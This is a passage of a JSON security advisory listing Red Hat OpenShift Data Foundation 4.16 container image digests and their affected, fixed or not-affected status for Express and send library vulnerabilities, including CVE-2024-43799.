"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb_arm64",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e_ppc64le",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5_s390x",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6_ppc64le",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a_s390x",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2_ppc64le",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "express: Improper Input Handling in Express Redirects"
},
{
"cve": "CVE-2024-43799",
"cwe": {
"id": "CWE-79",
"name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)"
},
"discovery_date": "2024-09-10T15:30:30.869487+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d_ppc64le",
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5_amd64",
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c_s390x",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b_s390x",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1_amd64",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87_amd64",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2_arm64",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8_arm64",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825_s390x",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477_amd64",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81_amd64",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1_s390x",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f_arm64",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c_amd64",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13_s390x",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121_arm64",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c_s390x",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc_amd64",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac_ppc64le",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30_s390x",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920_ppc64le",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9_s390x",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0_arm64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11_s390x",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235_arm64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f_amd64",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64_amd64",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8_arm64",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a_amd64",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3_amd64",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a_ppc64le",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4_s390x",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57_arm64",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5_s390x",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1_ppc64le",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6_amd64",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a_amd64",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c_s390x",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1_ppc64le",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd_amd64",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b_arm64",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea_ppc64le",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d_s390x",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d_amd64",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203_ppc64le",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9_s390x",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a_ppc64le",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996_amd64",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0_s390x",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231_ppc64le",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356_s390x",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388_amd64",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb_arm64",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e_ppc64le",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5_s390x",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6_ppc64le",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a_s390x",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2_ppc64le",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa_s390x"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2311153"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the Send library. This vulnerability allows remote code execution via untrusted input passed to the SendStream.redirect() function.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "send: Code Execution Vulnerability in Send Library",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64"
],
"known_not_affected": [
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d_ppc64le",
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5_amd64",
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c_s390x",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b_s390x",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1_amd64",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87_amd64",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2_arm64",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8_arm64",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825_s390x",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477_amd64",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81_amd64",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1_s390x",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f_arm64",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c_amd64",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13_s390x",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121_arm64",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c_s390x",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc_amd64",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac_ppc64le",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30_s390x",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920_ppc64le",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9_s390x",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0_arm64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11_s390x",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235_arm64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f_amd64",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64_amd64",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8_arm64",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a_amd64",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3_amd64",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a_ppc64le",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4_s390x",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57_arm64",
